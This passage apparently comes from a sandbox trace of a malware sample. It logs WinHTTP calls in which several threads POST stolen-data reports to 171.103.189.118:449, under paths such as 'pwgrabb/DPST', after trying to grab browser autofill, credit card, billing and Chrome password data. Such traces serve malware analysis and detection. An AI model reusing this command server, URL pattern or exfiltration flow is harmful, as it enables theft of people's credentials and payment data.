lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.180] WinHttpOpenRequest (hConnect=0x332bed00, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DPST//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x33323710 [0180.180] WinHttpSetOption (hInternet=0x33323710, dwOption=0x1f, lpBuffer=0x33caedb8, dwBufferLength=0x4) returned 1 [0180.180] WinHttpSendRequest (hRequest=0x33323710, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E968EE\r\nContent-Length: 131\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32a44120*, dwOptionalLength=0x83, dwTotalLength=0x83, dwContext=0x0) returned 1 [0184.304] WinHttpReceiveResponse (hRequest=0x33323710, lpReserved=0x0) returned 1 [0184.305] WinHttpQueryHeaders (in: hRequest=0x33323710, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x33caedb4, lpdwBufferLength=0x33caedbc, lpdwIndex=0x0 | out: lpBuffer=0x33caedb4*, lpdwBufferLength=0x33caedbc*=0x4, lpdwIndex=0x0) returned 1 [0184.305] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f5d0 | out: hHeap=0x2150000) returned 1 [0184.305] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bdd0 | out: hHeap=0x2150000) returned 1 [0184.305] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fea0 | out: hHeap=0x2150000) returned 1 [0184.305] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fe40 | out: hHeap=0x2150000) returned 1 [0184.305] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a44010 | out: hHeap=0x2150000) returned 1 [0184.305] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a44120 | out: hHeap=0x2150000) returned 1 [0184.305] Sleep (dwMilliseconds=0xbb8) [0187.306] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bef0 | out: hHeap=0x2150000) returned 1 [0187.306] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e414a0 | out: hHeap=0x2150000) returned 1 [0187.306] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234ba10 | out: hHeap=0x2150000) returned 1 [0187.306] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f5a0 | out: hHeap=0x2150000) returned 1 [0187.306] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e50190 | out: hHeap=0x2150000) returned 1 [0187.306] WinHttpCloseHandle (hInternet=0x33323710) returned 1 [0187.306] WinHttpCloseHandle (hInternet=0x332bed00) returned 1 [0187.306] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fba0 | out: hHeap=0x2150000) returned 1 Thread: id = 99 os_tid = 0x8b8 [0180.194] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x332bee90 [0180.194] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f750 [0180.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab autofill data: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0180.194] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f780 [0180.194] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab autofill data: ", cchWideChar=-1, lpMultiByteStr=0x32e6f780, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Failed to grab autofill data: ", lpUsedDefaultChar=0x0) returned 31 [0180.194] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f7e0 [0180.194] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bdf0 [0180.194] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f8d0 [0180.194] GetTickCount () returned 0xe968ee [0180.194] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32a441c0 [0180.194] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32a442d0 [0180.195] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x33d2e750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.195] WinHttpOpenRequest (hConnect=0x332bee90, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DPST//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x7cdae0 [0180.195] WinHttpSetOption (hInternet=0x7cdae0, dwOption=0x1f, lpBuffer=0x33d2edb8, dwBufferLength=0x4) returned 1 [0180.195] WinHttpSendRequest (hRequest=0x7cdae0, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E968EE\r\nContent-Length: 135\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32a442d0*, dwOptionalLength=0x87, dwTotalLength=0x87, dwContext=0x0) returned 1 [0183.420] WinHttpReceiveResponse (hRequest=0x7cdae0, lpReserved=0x0) returned 1 [0183.420] WinHttpQueryHeaders (in: hRequest=0x7cdae0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x33d2edb4, lpdwBufferLength=0x33d2edbc, lpdwIndex=0x0 | out: lpBuffer=0x33d2edb4*, lpdwBufferLength=0x33d2edbc*=0x4, lpdwIndex=0x0) returned 1 [0183.420] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f7e0 | out: hHeap=0x2150000) returned 1 [0183.420] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bdf0 | out: hHeap=0x2150000) returned 1 [0183.420] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f8d0 | out: hHeap=0x2150000) returned 1 [0183.420] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f780 | out: hHeap=0x2150000) returned 1 [0183.420] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a441c0 | out: hHeap=0x2150000) returned 1 [0183.420] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a442d0 | out: hHeap=0x2150000) returned 1 [0183.420] Sleep (dwMilliseconds=0xbb8) [0186.436] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b8f0 | out: hHeap=0x2150000) returned 1 [0186.436] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e50210 | out: hHeap=0x2150000) returned 1 [0186.436] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bc90 | out: hHeap=0x2150000) returned 1 [0186.436] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f6c0 | out: hHeap=0x2150000) returned 1 [0186.436] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e501d0 | out: hHeap=0x2150000) returned 1 [0186.436] WinHttpCloseHandle (hInternet=0x7cdae0) returned 1 [0186.437] WinHttpCloseHandle (hInternet=0x332bee90) returned 1 [0186.437] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f750 | out: hHeap=0x2150000) returned 1 Thread: id = 100 os_tid = 0x1264 [0180.209] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x332bdbd0 [0180.209] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e705c0 [0180.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab credit card data: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0180.209] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e41450 [0180.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab credit card data: ", cchWideChar=-1, lpMultiByteStr=0x32e41450, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Failed to grab credit card data: ", lpUsedDefaultChar=0x0) returned 34 [0180.209] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64d70 [0180.210] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234ba30 [0180.210] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70260 [0180.210] GetTickCount () returned 0xe968fd [0180.210] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32a44370 [0180.210] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32a444f0 [0180.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x33dae750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.210] WinHttpOpenRequest (hConnect=0x332bdbd0, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DPST//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x3332bb00 [0180.210] WinHttpSetOption (hInternet=0x3332bb00, dwOption=0x1f, lpBuffer=0x33daedb8, dwBufferLength=0x4) returned 1 [0180.210] WinHttpSendRequest (hRequest=0x3332bb00, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E968FD\r\nContent-Length: 138\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32a444f0*, dwOptionalLength=0x8a, dwTotalLength=0x8a, dwContext=0x0) returned 1 [0183.484] WinHttpReceiveResponse (hRequest=0x3332bb00, lpReserved=0x0) returned 1 [0183.484] WinHttpQueryHeaders (in: hRequest=0x3332bb00, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x33daedb4, lpdwBufferLength=0x33daedbc, lpdwIndex=0x0 | out: lpBuffer=0x33daedb4*, lpdwBufferLength=0x33daedbc*=0x4, lpdwIndex=0x0) returned 1 [0183.484] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64d70 | out: hHeap=0x2150000) returned 1 [0183.485] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234ba30 | out: hHeap=0x2150000) returned 1 [0183.485] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70260 | out: hHeap=0x2150000) returned 1 [0183.485] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41450 | out: hHeap=0x2150000) returned 1 [0183.485] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a44370 | out: hHeap=0x2150000) returned 1 [0183.485] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a444f0 | out: hHeap=0x2150000) returned 1 [0183.485] Sleep (dwMilliseconds=0xbb8) [0186.548] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234be10 | out: hHeap=0x2150000) returned 1 [0186.548] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a44490 | out: hHeap=0x2150000) returned 1 [0186.548] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bc70 | out: hHeap=0x2150000) returned 1 [0186.548] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70740 | out: hHeap=0x2150000) returned 1 [0186.548] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41410 | out: hHeap=0x2150000) returned 1 [0186.548] WinHttpCloseHandle (hInternet=0x3332bb00) returned 1 [0186.548] WinHttpCloseHandle (hInternet=0x332bdbd0) returned 1 [0186.548] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e705c0 | out: hHeap=0x2150000) returned 1 Thread: id = 101 os_tid = 0x1268 [0180.240] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c91e0 [0180.240] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70950 [0180.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab billing info data: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0180.241] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64f70 [0180.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab billing info data: ", cchWideChar=-1, lpMultiByteStr=0x32e64f70, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Failed to grab billing info data: ", lpUsedDefaultChar=0x0) returned 35 [0180.241] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e65030 [0180.241] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b950 [0180.241] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e703e0 [0180.241] GetTickCount () returned 0xe9691c [0180.241] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32a44590 [0180.241] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32803800 [0180.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x33e2e750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.241] WinHttpOpenRequest (hConnect=0x338c91e0, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DPST//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x338ca390 [0180.241] WinHttpSetOption (hInternet=0x338ca390, dwOption=0x1f, lpBuffer=0x33e2edb8, dwBufferLength=0x4) returned 1 [0180.241] WinHttpSendRequest (hRequest=0x338ca390, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E9691C\r\nContent-Length: 139\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32803800*, dwOptionalLength=0x8b, dwTotalLength=0x8b, dwContext=0x0) returned 1 [0181.806] WinHttpReceiveResponse (hRequest=0x338ca390, lpReserved=0x0) returned 1 [0181.806] WinHttpQueryHeaders (in: hRequest=0x338ca390, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x33e2edb4, lpdwBufferLength=0x33e2edbc, lpdwIndex=0x0 | out: lpBuffer=0x33e2edb4*, lpdwBufferLength=0x33e2edbc*=0x4, lpdwIndex=0x0) returned 1 [0181.806] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65030 | out: hHeap=0x2150000) returned 1 [0181.806] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b950 | out: hHeap=0x2150000) returned 1 [0181.806] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e703e0 | out: hHeap=0x2150000) returned 1 [0181.806] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64f70 | out: hHeap=0x2150000) returned 1 [0181.806] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a44590 | out: hHeap=0x2150000) returned 1 [0181.806] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803800 | out: hHeap=0x2150000) returned 1 [0181.807] Sleep (dwMilliseconds=0xbb8) [0185.852] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234ba50 | out: hHeap=0x2150000) returned 1 [0185.852] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32a446b0 | out: hHeap=0x2150000) returned 1 [0185.852] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234be30 | out: hHeap=0x2150000) returned 1 [0185.852] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70410 | out: hHeap=0x2150000) returned 1 [0185.852] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b70 | out: hHeap=0x2150000) returned 1 [0185.852] WinHttpCloseHandle (hInternet=0x338ca390) returned 1 [0185.853] WinHttpCloseHandle (hInternet=0x338c91e0) returned 1 [0185.853] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70950 | out: hHeap=0x2150000) returned 1 Thread: id = 102 os_tid = 0x1274 [0180.271] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c8880 [0180.271] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70290 [0180.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grab_Passwords_Chrome(): Can't open database", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0180.272] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64df0 [0180.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grab_Passwords_Chrome(): Can't open database", cchWideChar=-1, lpMultiByteStr=0x32e64df0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Grab_Passwords_Chrome(): Can't open database", lpUsedDefaultChar=0x0) returned 45 [0180.272] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e650f0 [0180.272] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bc10 [0180.272] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e707d0 [0180.272] GetTickCount () returned 0xe9693c [0180.272] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32803e40 [0180.272] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xa0) returned 0x328038a0 [0180.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x33eae750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.272] WinHttpOpenRequest (hConnect=0x338c8880, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DEBG//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x337c5960 [0180.272] WinHttpSetOption (hInternet=0x337c5960, dwOption=0x1f, lpBuffer=0x33eaedb8, dwBufferLength=0x4) returned 1 [0180.272] WinHttpSendRequest (hRequest=0x337c5960, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E9693C\r\nContent-Length: 149\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x328038a0*, dwOptionalLength=0x95, dwTotalLength=0x95, dwContext=0x0) returned 1 [0183.417] WinHttpReceiveResponse (hRequest=0x337c5960, lpReserved=0x0) returned 1 [0183.417] WinHttpQueryHeaders (in: hRequest=0x337c5960, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x33eaedb4, lpdwBufferLength=0x33eaedbc, lpdwIndex=0x0 | out: lpBuffer=0x33eaedb4*, lpdwBufferLength=0x33eaedbc*=0x4, lpdwIndex=0x0) returned 1 [0183.417] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650f0 | out: hHeap=0x2150000) returned 1 [0183.418] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bc10 | out: hHeap=0x2150000) returned 1 [0183.418] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e707d0 | out: hHeap=0x2150000) returned 1 [0183.418] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64df0 | out: hHeap=0x2150000) returned 1 [0183.418] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803e40 | out: hHeap=0x2150000) returned 1 [0183.418] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x328038a0 | out: hHeap=0x2150000) returned 1 [0183.418] Sleep (dwMilliseconds=0xbb8) [0186.434] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234ba70 | out: hHeap=0x2150000) returned 1 [0186.434] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803dd0 | out: hHeap=0x2150000) returned 1 [0186.434] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234be50 | out: hHeap=0x2150000) returned 1 [0186.434] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70860 | out: hHeap=0x2150000) returned 1 [0186.434] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e650b0 | out: hHeap=0x2150000) returned 1 [0186.434] WinHttpCloseHandle (hInternet=0x337c5960) returned 1 [0186.434] WinHttpCloseHandle (hInternet=0x338c8880) returned 1 [0186.434] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70290 | out: hHeap=0x2150000) returned 1 Thread: id = 103 os_tid = 0xd58 [0180.304] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c8a10 [0180.304] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e702c0 [0180.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="unable to open database file", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0180.304] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70440 [0180.304] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="unable to open database file", cchWideChar=-1, lpMultiByteStr=0x32e70440, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="unable to open database file", lpUsedDefaultChar=0x0) returned 29 [0180.304] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70980 [0180.304] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bc30 [0180.304] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70800 [0180.304] GetTickCount () returned 0xe9695b [0180.304] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32803950 [0180.304] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32803a60 [0180.305] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x33f2e750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.305] WinHttpOpenRequest (hConnect=0x338c8a10, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DEBG//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x337c5d20 [0180.305] WinHttpSetOption (hInternet=0x337c5d20, dwOption=0x1f, lpBuffer=0x33f2edb8, dwBufferLength=0x4) returned 1 [0180.305] WinHttpSendRequest (hRequest=0x337c5d20, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E9695B\r\nContent-Length: 133\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32803a60*, dwOptionalLength=0x85, dwTotalLength=0x85, dwContext=0x0) returned 1 [0181.822] WinHttpReceiveResponse (hRequest=0x337c5d20, lpReserved=0x0) returned 1 [0181.822] WinHttpQueryHeaders (in: hRequest=0x337c5d20, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x33f2edb4, lpdwBufferLength=0x33f2edbc, lpdwIndex=0x0 | out: lpBuffer=0x33f2edb4*, lpdwBufferLength=0x33f2edbc*=0x4, lpdwIndex=0x0) returned 1 [0181.822] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70980 | out: hHeap=0x2150000) returned 1 [0181.822] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bc30 | out: hHeap=0x2150000) returned 1 [0181.822] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70800 | out: hHeap=0x2150000) returned 1 [0181.823] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70440 | out: hHeap=0x2150000) returned 1 [0181.823] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803950 | out: hHeap=0x2150000) returned 1 [0181.823] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803a60 | out: hHeap=0x2150000) returned 1 [0181.823] Sleep (dwMilliseconds=0xbb8) [0185.855] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234ba90 | out: hHeap=0x2150000) returned 1 [0185.855] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32803f50 | out: hHeap=0x2150000) returned 1 [0185.855] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b7b0 | out: hHeap=0x2150000) returned 1 [0185.855] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e701a0 | out: hHeap=0x2150000) returned 1 [0185.855] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65070 | out: hHeap=0x2150000) returned 1 [0185.855] WinHttpCloseHandle (hInternet=0x337c5d20) returned 1 [0185.855] WinHttpCloseHandle (hInternet=0x338c8a10) returned 1 [0185.855] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e702c0 | out: hHeap=0x2150000) returned 1 Thread: id = 104 os_tid = 0xd18 [0180.328] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c8ba0 [0180.328] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e702f0 [0180.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab passwords: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0180.328] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70470 [0180.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab passwords: ", cchWideChar=-1, lpMultiByteStr=0x32e70470, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Failed to grab passwords: ", lpUsedDefaultChar=0x0) returned 27 [0180.328] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e709b0 [0180.328] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bc50 [0180.328] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70830 [0180.328] GetTickCount () returned 0xe9696b [0180.328] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32803b00 [0180.328] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32803c70 [0180.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x33fae750, cbMultiByte=1024, lpDefaultChar=0x0, 